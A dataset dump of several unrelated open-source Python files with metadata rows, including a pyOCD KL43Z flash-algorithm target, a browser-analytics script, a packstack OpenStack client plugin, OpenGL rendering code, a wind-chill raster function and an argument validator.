topPlate.state.pos=Vector3(0,0,hMax(2)+radius)
topPlate.state.vel=Vector3(0,0,-v)
def dataCollector():
S=pi*l**2
Fnt=O.forces.f(topPlate.id)[2]
Fnb=O.forces.f(bottomPlate.id)[2]
#sigma=Fnb/S
plot.addData(t1=O.time,t2=O.time,Fnb=Fnb,Fnt=Fnt)
plot.plots={'t1':('Fnb'),'t2':('Fnt')}
plot.plot(noShow=False, subPlots=True)
#########################
### ENGINE DEFINITION ##
#########################
O.dt=0.5*PWaveTimeStep()
O.engines=[
ForceResetter(),
InsertionSortCollider([
Bo1_Sphere_Aabb(),
Bo1_Wall_Aabb(),
Bo1_Facet_Aabb(),
]),
InteractionLoop([
Ig2_Sphere_Sphere_ScGeom(),
Ig2_Facet_Sphere_ScGeom(),
Ig2_Wall_Sphere_ScGeom()
],
[Ip2_CohFrictMat_CohFrictMat_CohFrictPhys(setCohesionNow=True,setCohesionOnNewContacts=True),
Ip2_FrictMat_FrictMat_FrictPhys()],
[Law2_ScGeom6D_CohFrictPhys_CohesionMoment(),
Law2_ScGeom_FrictPhys_CundallStrack(),
Law2_ScGridCoGeom_FrictPhys_CundallStrack(),
Law2_GridCoGridCoGeom_FrictPhys_CundallStrack()
]
),
DomainLimiter(lo=(-l,-l,0),hi=(l,l,1),iterPeriod=200),
NewtonIntegrator(damping=0.7,gravity=(0,0,-9.81),label='Newton'),
PyRunner(initRun=True,iterPeriod=1,command='dataCollector()'),
]
|
gpl-2.0
| 1,837,860,220,478,985,200
| 28.3125
| 137
| 0.650518
| false
| 2.568075
| false
| false
| false
|
mesheven/pyOCD
|
pyocd/target/target_MKL43Z256xxx4.py
|
1
|
6800
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013,2018 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .family.target_kinetis import Kinetis
from .family.flash_kinetis import Flash_Kinetis
from ..core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ..debug.svd import SVDFile
import logging
FLASH_ALGO = { 'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x09032200, 0xd373428b, 0x428b0a03, 0x0b03d358, 0xd33c428b, 0x428b0c03, 0xe012d321, 0x430b4603,
0x2200d47f, 0x428b0843, 0x0903d374, 0xd35f428b, 0x428b0a03, 0x0b03d344, 0xd328428b, 0x428b0c03,
0x22ffd30d, 0xba120209, 0x428b0c03, 0x1212d302, 0xd0650209, 0x428b0b03, 0xe000d319, 0x0bc30a09,
0xd301428b, 0x1ac003cb, 0x0b834152, 0xd301428b, 0x1ac0038b, 0x0b434152, 0xd301428b, 0x1ac0034b,
0x0b034152, 0xd301428b, 0x1ac0030b, 0x0ac34152, 0xd301428b, 0x1ac002cb, 0x0a834152, 0xd301428b,
0x1ac0028b, 0x0a434152, 0xd301428b, 0x1ac0024b, 0x0a034152, 0xd301428b, 0x1ac0020b, 0xd2cd4152,
0x428b09c3, 0x01cbd301, 0x41521ac0, 0x428b0983, 0x018bd301, 0x41521ac0, 0x428b0943, 0x014bd301,
0x41521ac0, 0x428b0903, 0x010bd301, 0x41521ac0, 0x428b08c3, 0x00cbd301, 0x41521ac0, 0x428b0883,
0x008bd301, 0x41521ac0, 0x428b0843, 0x004bd301, 0x41521ac0, 0xd2001a41, 0x41524601, 0x47704610,
0x0fcae05d, 0x4249d000, 0xd3001003, 0x40534240, 0x469c2200, 0x428b0903, 0x0a03d32d, 0xd312428b,
0x018922fc, 0x0a03ba12, 0xd30c428b, 0x11920189, 0xd308428b, 0x11920189, 0xd304428b, 0xd03a0189,
0xe0001192, 0x09c30989, 0xd301428b, 0x1ac001cb, 0x09834152, 0xd301428b, 0x1ac0018b, 0x09434152,
0xd301428b, 0x1ac0014b, 0x09034152, 0xd301428b, 0x1ac0010b, 0x08c34152, 0xd301428b, 0x1ac000cb,
0x08834152, 0xd301428b, 0x1ac0008b, 0xd2d94152, 0x428b0843, 0x004bd301, 0x41521ac0, 0xd2001a41,
0x46634601, 0x105b4152, 0xd3014610, 0x2b004240, 0x4249d500, 0x46634770, 0xd300105b, 0xb5014240,
0x46c02000, 0xbd0246c0, 0xb510480a, 0x44484908, 0xf8ecf000, 0xd1042800, 0x21004806, 0xf0004448,
0x4a05f9b1, 0x230168d1, 0x4319029b, 0xbd1060d1, 0x6b65666b, 0x00000004, 0xf0003000, 0x4c0cb570,
0x444c4605, 0x4b0b4601, 0x68e24620, 0xf894f000, 0xd1052800, 0x46292300, 0x68e24620, 0xf956f000,
0x68ca4905, 0x029b2301, 0x60ca431a, 0x0000bd70, 0x00000004, 0x6b65666b, 0xf0003000, 0x4905b510,
0x60082000, 0x44484804, 0xf8e8f000, 0xd0002800, 0xbd102001, 0x40048100, 0x00000004, 0x460cb570,
0x4606460b, 0x480d4601, 0x4615b084, 0xf0004448, 0x2800f8f5, 0x9001d10a, 0x21019002, 0x91004807,
0x4622462b, 0x44484631, 0xf96af000, 0x68ca4904, 0x029b2301, 0x60ca431a, 0xbd70b004, 0x00000004,
0xf0003000, 0x47702000, 0xd0032800, 0xd801290f, 0xd0012a04, 0x47702004, 0x47702000, 0xd1012800,
0x47702004, 0x1e5bb410, 0x421c460c, 0x421ad101, 0xbc10d002, 0x47702065, 0x428b6803, 0x6840d804,
0x18181889, 0xd2024288, 0x2066bc10, 0xbc104770, 0x47702000, 0x42884903, 0x206bd001, 0x20004770,
0x00004770, 0x6b65666b, 0x2170480a, 0x21807001, 0x78017001, 0xd5fc0609, 0x06817800, 0x2067d501,
0x06c14770, 0x2068d501, 0x07c04770, 0x2069d0fc, 0x00004770, 0x40020000, 0x4605b5f8, 0x460c4616,
0xf7ff4618, 0x2800ffd7, 0x2304d12b, 0x46214632, 0xf7ff4628, 0x0007ffb3, 0x19a6d123, 0x68e91e76,
0x91004630, 0xfe3cf7ff, 0xd0032900, 0x1c409e00, 0x1e764346, 0xd81342b4, 0x4478480a, 0x60046800,
0x20094909, 0xf7ff71c8, 0x4607ffbf, 0x280069a8, 0x4780d000, 0xd1032f00, 0x190468e8, 0xd9eb42b4,
0xbdf84638, 0x0000026a, 0x40020000, 0x4604b510, 0xf7ff4608, 0x2800ff9f, 0x2c00d106, 0x4904d005,
0x71c82044, 0xffa0f7ff, 0x2004bd10, 0x0000bd10, 0x40020000, 0xd00c2800, 0xd00a2a00, 0xd21a2908,
0x447b000b, 0x18db791b, 0x0705449f, 0x0d0b0907, 0x2004110f, 0x68c04770, 0x6840e00a, 0x6880e008,
0x6800e006, 0x2000e004, 0x6900e002, 0x6940e000, 0x20006010, 0x206a4770, 0x00004770, 0xd0142800,
0x68c9490c, 0x0e094a0c, 0x447a0049, 0x03095a51, 0x2200d00d, 0x60416002, 0x60812102, 0x61426102,
0x61820249, 0x461060c1, 0x20044770, 0x20644770, 0x00004770, 0x40048040, 0x0000019a, 0xd1012a00,
0x47702004, 0x461cb5ff, 0x4615b081, 0x2304460e, 0x98014622, 0xff22f7ff, 0xd1190007, 0xd0162c00,
0x4478480c, 0x600e6801, 0x6800cd02, 0x490a6041, 0x71c82006, 0xff38f7ff, 0x98014607, 0x28006980,
0x4780d000, 0xd1022f00, 0x1f241d36, 0x4638d1e8, 0xbdf0b005, 0x00000162, 0x40020000, 0xd0022800,
0x20006181, 0x20044770, 0x00004770, 0xb081b5ff, 0x460e4614, 0x23044605, 0xfef0f7ff, 0xd12a2800,
0x686868a9, 0xfd7cf7ff, 0x42719000, 0x40014240, 0x42b7424f, 0x9800d101, 0x2c00183f, 0x1bbdd01a,
0xd90042a5, 0x490d4625, 0x447908a8, 0x600e6809, 0x2201490b, 0x0a0271ca, 0x728872ca, 0x72489804,
0xfef2f7ff, 0xd1062800, 0x1b649800, 0x183f1976, 0xd1e42c00, 0xb0052000, 0x0000bdf0, 0x000000da,
0x40020000, 0xd1012800, 0x47702004, 0x4803b510, 0x71c22240, 0xf7ff7181, 0xbd10fed7, 0x40020000,
0xd1012b00, 0x47702004, 0x461cb5f8, 0x460e4615, 0x9f082304, 0xfea2f7ff, 0xd1192800, 0xd0172d00,
0x447a4a0f, 0x60066810, 0x2102480e, 0x990671c1, 0x681172c1, 0x60886820, 0xfeb6f7ff, 0xd0082800,
0x29009907, 0x600ed000, 0xd0012f00, 0x60392100, 0x1f2dbdf8, 0x1d361d24, 0xd1e12d00, 0x0000bdf8,
0x00000062, 0x40020000, 0x00040002, 0x00080000, 0x00100000, 0x00200000, 0x00400000, 0x00000000,
0x00000000, 0x00400000, 0x40020004, 0x00000000,
],
'pc_init' : 0x2000027D,
'pc_unInit': 0x200002E5,
'pc_program_page': 0x2000029D,
'pc_erase_sector': 0x2000023D,
'pc_eraseAll' : 0x20000209,
'static_base' : 0x20000000 + 0x00000020 + 0x0000060c,
'begin_stack' : 0x20000000 + 0x00000800,
'begin_data' : 0x20000000 + 0x00000A00,
'page_buffers' : [0x20000a00, 0x20001200], # Enable double buffering
'min_program_length' : 4,
'analyzer_supported' : True,
'analyzer_address' : 0x20002000
};
class KL43Z4(Kinetis):
memoryMap = MemoryMap(
FlashRegion( start=0, length=0x40000, blocksize=0x400, is_boot_memory=True,
algo=FLASH_ALGO, flash_class=Flash_Kinetis),
RamRegion( start=0x1fffe000, length=0x8000)
)
def __init__(self, transport):
super(KL43Z4, self).__init__(transport, self.memoryMap)
self._svd_location = SVDFile(vendor="Freescale", filename="MKL43Z4.svd")
|
apache-2.0
| 9,023,858,836,470,273,000
| 64.384615
| 101
| 0.769559
| false
| 2.073803
| false
| false
| false
|
samdsmx/omegaup
|
stuff/browser_analytics.py
|
2
|
7171
|
#!/usr/bin/python3
"""Analyze browser usage from Google Analytics.
In order to use this tool, export a .csv report of browsers (Audience >
Technology > Browser & OS), with Secondary dimension of Browser Version.
The mappings of some browser versions to their equivalent Chromium version may
need to be maintained every now and then.
"""
import argparse
import collections
import csv
import dataclasses
from typing import Callable, DefaultDict, List, Sequence, TextIO, Tuple
@dataclasses.dataclass
class Browser:
"""A Browser version"""
name: str = ''
version: str = ''
users: int = 0
users_share: float = 0
def _parse_report(report: TextIO,
column: str) -> Tuple[Browser, List[Browser]]:
# pylint: disable=too-many-branches,too-many-statements
csv_lines: List[str] = []
# Strip the header. It consists of a series of lines that start with #
# followed by an empty line.
for line in report:
if line.strip():
continue
break
# Parse the contents.
for line in report:
line = line.strip()
if not line:
break
csv_lines.append(line)
browser_mapping: DefaultDict[Tuple[str, str],
Browser] = collections.defaultdict(Browser)
reader = csv.DictReader(csv_lines)
totals = Browser(name='Total', users_share=1.)
for row in reader:
version = row['Browser Version'].split('.')[0]
if not version.isnumeric():
version = ''
name = row['Browser']
if name == 'Edge' and version >= '79':
# Edge started using Chromium since version 79.
name = 'Chrome'
elif name == 'Android Webview' and version >= '36':
# Android started using Chromium since Lollipop / version 36.
name = 'Chrome'
elif name == 'UC Browser':
chromium_version_mapping = {
'12': '57',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Samsung Internet':
chromium_version_mapping = {
'4': '44',
'5': '51',
'6': '56',
'7': '59',
'8': '63',
'9': '67',
'10': '71',
'11': '75',
'12': '79',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Opera':
chromium_version_mapping = {
'47': '48',
'50': '63',
'51': '64',
'52': '65',
'53': '66',
'54': '67',
'55': '68',
'56': '69',
'57': '70',
'58': '71',
'59': '72',
'60': '73',
'61': '74',
'62': '75',
'63': '76',
'64': '77',
'65': '78',
'66': '79',
'67': '80',
'68': '80',
'69': '83',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'YaBrowser':
chromium_version_mapping = {
'20': '83',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Safari':
# Some versions of Safari report the WebKit version, not the Safari
# one.
if version == '602':
version = '10'
if version == '604':
version = '11'
if version == '605':
version = '11'
key = (name, version)
if key == ('', ''):
# This is the totals row
continue
value = int(row[column].replace(',', ''))
browser_mapping[key].users += value
totals.users += value
for (name, version), browser in browser_mapping.items():
browser.name = name
browser.version = version
browser.users_share = browser.users / totals.users
return totals, list(browser_mapping.values())
def _is_filtered(browser: Browser, ignore: Sequence[str]) -> bool:
for descriptor in ignore:
op_mapping: Sequence[Tuple[str, Callable[[int, int], bool]]] = (
('<=', lambda a, b: a <= b),
('=', lambda a, b: a == b),
('<', lambda a, b: a < b),
)
for op, fn in op_mapping:
if op not in descriptor:
continue
name, version = descriptor.split(op)
if browser.name == name and fn(int(browser.version), int(version)):
return True
if browser.name == descriptor:
return True
return False
def _main() -> None:
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--ignore',
default=[
'Android Browser',
'Android Runtime',
'Android Webview<36',
'Chrome<51',
'Firefox<68',
'Hexometer',
'Internet Explorer',
'Opera Mini',
'Safari<12',
'Samsung Internet<4',
'[FBAN',
],
type=str,
nargs='*',
help='Ignore browser')
parser.add_argument('--column', default='Users')
parser.add_argument('--sort-by-share', action='store_true')
parser.add_argument('report',
type=argparse.FileType('r'),
metavar='REPORT.CSV',
help='An exported .csv from Google Analytics')
args = parser.parse_args()
totals, browsers = _parse_report(args.report, args.column)
if args.sort_by_share:
browsers.sort(key=lambda b: b.users, reverse=True)
else:
browsers.sort(key=lambda b: (b.name, b.version))
cumulative = 0.
print(f'{"Browser name":20} {"Version":7} '
f'{"Users":>6} {"Share%":>7} {"Cmltiv%":>7} ')
print('=' * 51)
for browser in browsers:
if _is_filtered(browser, args.ignore):
continue
cumulative += browser.users
print(f'{browser.name:20} {browser.version:>7} '
f'{browser.users:6} '
f'{browser.users_share*100:6.2f}% '
f'{cumulative/totals.users*100:6.2f}%')
print('=' * 51)
print(f'{totals.name:20} {totals.version:>7} '
f'{totals.users:6} '
f'{totals.users_share*100:6.2f}% '
f'{cumulative/totals.users*100:6.2f}%')
if __name__ == '__main__':
_main()
|
bsd-3-clause
| -5,068,709,898,575,506,000
| 32.509346
| 79
| 0.473714
| false
| 4.253262
| false
| false
| false
|
MariusCC/packstack
|
packstack/plugins/openstack_client_400.py
|
1
|
2747
|
"""
Installs and configures an OpenStack Client
"""
import logging
from packstack.installer import validators
from packstack.installer import basedefs, output_messages
from packstack.installer import utils
from packstack.modules.ospluginutils import getManifestTemplate, appendManifestFile
# Controller object will be initialized from main flow
controller = None
# Plugin name
PLUGIN_NAME = "OS-CLIENT"
PLUGIN_NAME_COLORED = utils.color_text(PLUGIN_NAME, 'blue')
logging.debug("plugin %s loaded", __name__)
def initConfig(controllerObject):
global controller
controller = controllerObject
logging.debug("Adding OpenStack Client configuration")
paramsList = [
{"CMD_OPTION" : "osclient-host",
"USAGE" : "The IP address of the server on which to install the OpenStack client packages. An admin \"rc\" file will also be installed",
"PROMPT" : "Enter the IP address of the client server",
"OPTION_LIST" : [],
"VALIDATORS" : [validators.validate_ssh],
"DEFAULT_VALUE" : utils.get_localhost_ip(),
"MASK_INPUT" : False,
"LOOSE_VALIDATION": True,
"CONF_NAME" : "CONFIG_OSCLIENT_HOST",
"USE_DEFAULT" : False,
"NEED_CONFIRM" : False,
"CONDITION" : False },
]
groupDict = { "GROUP_NAME" : "NOVACLIENT",
"DESCRIPTION" : "NOVACLIENT Config parameters",
"PRE_CONDITION" : "CONFIG_CLIENT_INSTALL",
"PRE_CONDITION_MATCH" : "y",
"POST_CONDITION" : False,
"POST_CONDITION_MATCH" : True}
controller.addGroup(groupDict, paramsList)
def initSequences(controller):
if controller.CONF['CONFIG_CLIENT_INSTALL'] != 'y':
return
osclientsteps = [
{'title': 'Adding OpenStack Client manifest entries', 'functions':[createmanifest]}
]
controller.addSequence("Installing OpenStack Client", [], [], osclientsteps)
def createmanifest():
client_host = controller.CONF['CONFIG_OSCLIENT_HOST'].strip()
manifestfile = "%s_osclient.pp" % client_host
manifestdata = getManifestTemplate("openstack_client.pp")
appendManifestFile(manifestfile, manifestdata)
server = utils.ScriptRunner(client_host)
server.append('echo $HOME')
rc, root_home = server.execute()
msg = ("To use the command line tools you need to source the file "
"%s/keystonerc_admin created on %s")
controller.MESSAGES.append(msg % (root_home.strip(), client_host))
|
apache-2.0
| -7,500,177,406,174,176,000
| 37.152778
| 165
| 0.603568
| false
| 4.226154
| true
| false
| false
|
renatopp/psi-robotics
|
psi/engine/render_batch.py
|
1
|
4484
|
# =============================================================================
# Federal University of Rio Grande do Sul (UFRGS)
# Connectionist Artificial Intelligence Laboratory (LIAC)
# Renato de Pontes Pereira - renato.ppontes@gmail.com
# =============================================================================
# Copyright (c) 2011 Renato de Pontes Pereira, renato.ppontes at gmail dot com
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# =============================================================================
import psi
import numpy as np
from OpenGL.GL import *
from OpenGL.GLU import *
from OpenGL.GLUT import *
from OpenGL.arrays.vbo import VBO
__all__ = ['RenderBatch', 'RenderBatchOpt']
class RenderBatch(object):
def __init__(self, draw_type=GL_QUADS):
self.count = 0
self.color_data = []
self.position_data = []
self.color_buffer = VBO(np.array([]))
self.position_buffer = VBO(np.array([]))
self.draw_type = draw_type
def draw2d(self, points, color=(0, 0, 0, 1), rotation=0, center=(0, 0)):
n = len(points)
self.count += n
if not isinstance(color[0], (tuple, list)):
color = [color]*n
if rotation:
transform = psi.calc.rotation_matrix(rotation)
temp = np.array(points) - center
temp = transform.dot(temp.T).T + center
points = temp.tolist()
self.color_data.extend(color)
self.position_data.extend(points)
def clear(self):
self.position_data = []
self.color_data = []
self.count = 0
def render(self):
self.color_buffer.set_array(np.array(self.color_data, dtype='float32'))
self.position_buffer.set_array(np.array(self.position_data, dtype='float32'))
self.color_buffer.bind()
glColorPointer(4, GL_FLOAT, 0, self.color_buffer)
self.position_buffer.bind()
glVertexPointer(2, GL_FLOAT, 0, self.position_buffer)
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glDrawArrays(self.draw_type, 0, self.count)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_VERTEX_ARRAY)
class RenderBatchOpt(object):
def __init__(self, draw_type=GL_QUADS):
self.count = 0
self.color_buffer = VBO(np.array([]))
self.vertex_buffer = VBO(np.array([]))
self.draw_type = draw_type
def draw2d(self, points, color=(0, 0, 0, 1), rotation=0, center=(0, 0)):
n = points.shape[0]
self.count += n
if rotation:
transform = psi.calc.rotation_matrix(rotation)
temp = points - center
temp = transform.dot(temp.T).T + center
points = temp.tolist()
self.color_buffer.set_array(color)
self.vertex_buffer.set_array(points)
def clear(self):
self.color_buffer.set_array(np.array([]))
self.vertex_buffer.set_array(np.array([]))
self.count = 0
def render(self):
self.color_buffer.bind()
glColorPointer(4, GL_FLOAT, 0, self.color_buffer)
self.vertex_buffer.bind()
glVertexPointer(2, GL_FLOAT, 0, self.vertex_buffer)
glEnableClientState(GL_VERTEX_ARRAY)
glEnableClientState(GL_COLOR_ARRAY)
glDrawArrays(self.draw_type, 0, self.count)
glDisableClientState(GL_COLOR_ARRAY)
glDisableClientState(GL_VERTEX_ARRAY)
|
mit
| -5,479,215,739,809,386,000
| 34.595238
| 85
| 0.622212
| false
| 3.835757
| false
| false
| false
|
hfeeki/transifex
|
transifex/txcommon/listeners.py
|
1
|
1502
|
from django.conf import settings
from django.contrib.auth.models import Group, SiteProfileNotAvailable
from django.core.exceptions import ImproperlyConfigured
from django.db import models, transaction
from transifex.txcommon.log import logger
if not settings.AUTH_PROFILE_MODULE:
raise SiteProfileNotAvailable
try:
app_label, model_name = settings.AUTH_PROFILE_MODULE.split('.')
Profile = models.get_model(app_label, model_name)
except (ImportError, ImproperlyConfigured):
raise SiteProfileNotAvailable
if not Profile:
raise SiteProfileNotAvailable
@transaction.commit_manually
def add_user_to_registered_group(sender, **kwargs):
"""
Add any user created on the system to the `registered` group.
This signal must be called by the post_save signal from the User class.
This signal also creates a public profile for the user if it does not exist.
"""
if 'created' in kwargs and kwargs['created'] is True:
user = kwargs['instance']
# Add user to registered group
group, created = Group.objects.get_or_create(name='registered')
user.groups.add(group)
sid = transaction.savepoint()
# Create Public Profile
try:
profile, created = Profile.objects.get_or_create(user=user)
profile.save()
transaction.savepoint_commit(sid)
except:
logger.debug("User profile not created.")
transaction.savepoint_rollback(sid)
transaction.commit()
|
gpl-2.0
| 5,225,806,281,291,356,000
| 33.136364
| 80
| 0.703728
| false
| 4.34104
| false
| false
| false
|
Esri/solutions-raster-functions
|
scripts/WindChillNonUV.py
|
1
|
6467
|
# ----------------------------------------------------------------------------------
# Copyright 2015 Esri
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------------
# Name: Windchill_non_uv
# Description: Raster function that calculates wind chill using a single variable for windspeed.
# Date Edited: 24/03/2015
#-----------------------------------------------------------------------------------
import numpy as np
class Windchill_non_uv():
def __init__(self):
self.name = "Wind Chill Function"
self.description = "This function computes wind chill on the Fahrenheit scale given wind speed and air temperature."
self.tempunits = "celsius"
self.windunits = "mps"
def getParameterInfo(self):
return [
{
'name': 'temperature', # Needs to be edited by user to match name of varaiable in their dataset
'dataType': 'raster',
'value': None,
'required': True,
'displayName': "Temperature Raster",
'description': "A single-band raster where pixel values represent ambient air temperature in Fahrenheit."
},
{
'name': 'units',
'dataType': 'string',
'value': 'Kelvin', # Needs to be edited by the user to match what their units are for the temperature variable.
'required': True,
'domain': ('Celsius', 'Fahrenheit', 'Kelvin'),
'displayName': "Temperature Measured In",
'description': "The unit of measurement associated with the temperature raster."
},
{
'name': 'units2',
'dataType': 'string',
'value': 'mps', # Needs to be edited by the user to match what their units are for the wind speed variable.
'required': True,
'domain': ('mps', 'mph', 'kmph', 'knots'),
'displayName': "Temperature Measured In",
'description': "The unit of measurement associated with the temperature raster."
},
{
'name': 'ws', # Needs to be edited by user to match name of varaiable in their dataset
'dataType': 'raster',
'value': None,
'required': True,
'displayName': "Wind-speed Raster",
'description': "A single-band raster where pixel values represent wind speed measured in miles per hour."
},
]
def getConfiguration(self, **scalars):
return {
'inheritProperties': 4 | 8, # inherit all but the pixel type and NoData from the input raster
'invalidateProperties': 2 | 4 | 8, # invalidate statistics & histogram on the parent dataset because we modify pixel values.
'inputMask': False # Don't need input raster mask in .updatePixels(). Simply use the inherited NoData.
}
def updateRasterInfo(self, **kwargs):
kwargs['output_info']['bandCount'] = 1 # output is a single band raster
kwargs['output_info']['statistics'] = ({'minimum': -90, 'maximum': 40}, ) # we know nothing about the stats of the outgoing raster.
kwargs['output_info']['histogram'] = () # we know nothing about the histogram of the outgoing raster.
kwargs['output_info']['pixelType'] = 'f4'
# Getting and then setting the Temprature Units for use later
if kwargs.get('units').lower() == 'celsius':
self.tempunits = 'celsius'
elif kwargs.get('units').lower() == 'farenheit':
self.tempunits = 'farenheit'
elif kwargs.get('units').lower() == 'kelvin':
self.tempunits = 'kelvin'
# Getting and then setting the Windspeed Units for use later
if kwargs.get('units2').lower() == 'mps':
self.windunits = 'mps'
elif kwargs.get('units2').lower() == 'mph':
self.windunits = 'mph'
elif kwargs.get('units2').lower() == 'kmph':
self.windunits = 'kmph'
elif kwargs.get('units2').lower() == 'knots':
self.windunits = 'knots'
#self.doConversion = bool(kwargs.get('units', 'Fahrenheit').lower() == 'Celsius')
return kwargs
def updatePixels(self, tlc, size, props, **pixelBlocks):
ws = np.array(pixelBlocks['ws_pixels'], dtype='f4')
t = np.array(pixelBlocks['temperature_pixels'], dtype='f4')
# Using the temperature variable generated earlier to know if a calculation is needed to turn the temp into degrees F
if self.tempunits.lower() == "celsius":
t = (9.0/5.0 * t) + 32.0
elif self.tempunits.lower() == "kelvin":
t = ((((t)-273.15)*1.8000) +32.00)
else:
t = t
# Using the windspeed variable generated earlier to know if a calculation is needed to turn the windspeed into mph
if self.windunits.lower() == "mps":
ws = ws * 2.2369362920544
elif self.windunits.lower() == "kmph":
ws = ws * 0.621371
elif self.windunits() == "knots"
ws = ws * 1.15078
else:
ws = ws
ws16 = np.power(ws, 0.16)
outBlock = 35.74 + (0.6215 * t) - (35.75 * ws16) + (0.4275 * t * ws16)
pixelBlocks['output_pixels'] = outBlock.astype(props['pixelType'])
return pixelBlocks
def updateKeyMetadata(self, names, bandIndex, **keyMetadata):
if bandIndex == -1:
keyMetadata['datatype'] = 'Scientific'
keyMetadata['datatype'] = 'Windchill'
elif bandIndex == 0:
keyMetadata['wavelengthmin'] = None # reset inapplicable band-specific key metadata
keyMetadata['wavelengthmax'] = None
keyMetadata['bandname'] = 'Windchill'
return keyMetadata
|
apache-2.0
| -6,303,209,935,558,709,000
| 43.6
| 141
| 0.562394
| false
| 4.158842
| false
| false
| false
|
osroom/osroom
|
apps/core/flask/reqparse.py
|
1
|
4656
|
#!/usr/bin/env python
# -*-coding:utf-8-*-
# @Time : 2017/11/1 ~ 2019/9/1
# @Author : Allen Woo
from flask_babel import gettext
import regex as re
class ArgVerify:
def required(self, **kwargs):
for reqarg in kwargs.get("reqargs"):
if not reqarg[1]:
data = {'msg': gettext('The "{}" cannot be empty').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def min_len(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if len(reqarg[1]) < vr:
data = {'msg': gettext('The minimum length of "{}" is {} characters').format(
reqarg[0], vr), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def max_len(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if len(reqarg[1]) > vr:
data = {'msg': gettext('The maximum length of "{}" is {} characters').format(
reqarg[0], vr), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def need_type(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if not isinstance(reqarg[1], vr):
data = {'msg': gettext('"{}" needs to be of type {}').format(
reqarg[0], vr.__name__), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def only(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if not reqarg[1] in kwargs.get("vr"):
data = {
'msg': gettext('The value of parameter "{}" can only be one of "{}"').format(
reqarg[0],
",".join(vr)),
'msg_type': "w",
"custom_status": 422}
return False, data
return True, None
def can_not(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if reqarg[1] in vr:
data = {'msg': gettext('The value of parameter "{}" can not be "{}"').format(
reqarg[0], ",".join(vr)), 'msg_type': "w", "custom_status": 422}
return False, data
return True, None
def allowed_type(self, **kwargs):
vr = kwargs.get("vr")
for reqarg in kwargs.get("reqargs"):
if type(reqarg[1]) not in vr:
data = {
'msg': gettext('Parameter {} can only be of the following type: "{}"').format(
reqarg[0],
",".join(vr)),
'msg_type': 'error',
"custom_status": 422}
return False, data
return True, None
def regex_rule(self, **kwargs):
vr = kwargs.get("vr")
if vr["is_match"]:
for reqarg in kwargs.get("reqargs"):
if not re.search(vr["rule"], reqarg[1]):
return False, {
'msg': gettext('The value of parameter "{}" is illegal').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
else:
for reqarg in kwargs.get("reqargs"):
if re.search(vr["rule"], reqarg[1]):
return False, {
'msg': gettext('The value of parameter "{}" is illegal').format(
reqarg[0]), 'msg_type': "w", "custom_status": 422}
return True, None
arg_ver = ArgVerify()
def arg_verify(reqargs=[], **kwargs):
"""
:param reqargs:数组,如:[(arg_key, arg_value)]
:param required:bool, 为True表示不能为空
:param min_len: int, 最小长度
:param max_len: int, 最大长度
:param need_type: 类型如int, dict, list .tuple
:param only: 数组, 只能是only数组中的元素
:param can_not: 数组, 不能是can_not中的元素
:param allowed_type: 数组, 允许数据的类型是allowed_type中的元素
:param regex_rule: Such as::{"rule":r".*", "is_match":True}
is_match :True 表示需要匹配成功, False 表示需要不匹配该规则的
:param args:
:param kwargs:
:return:验证状态,验证信息
"""
for k, v in kwargs.items():
s, r = getattr(arg_ver, k)(reqargs=reqargs, vr=v)
if not s:
return s, r
return True, None
|
bsd-2-clause
| 7,536,587,753,218,895,000
| 34.322835
| 98
| 0.488185
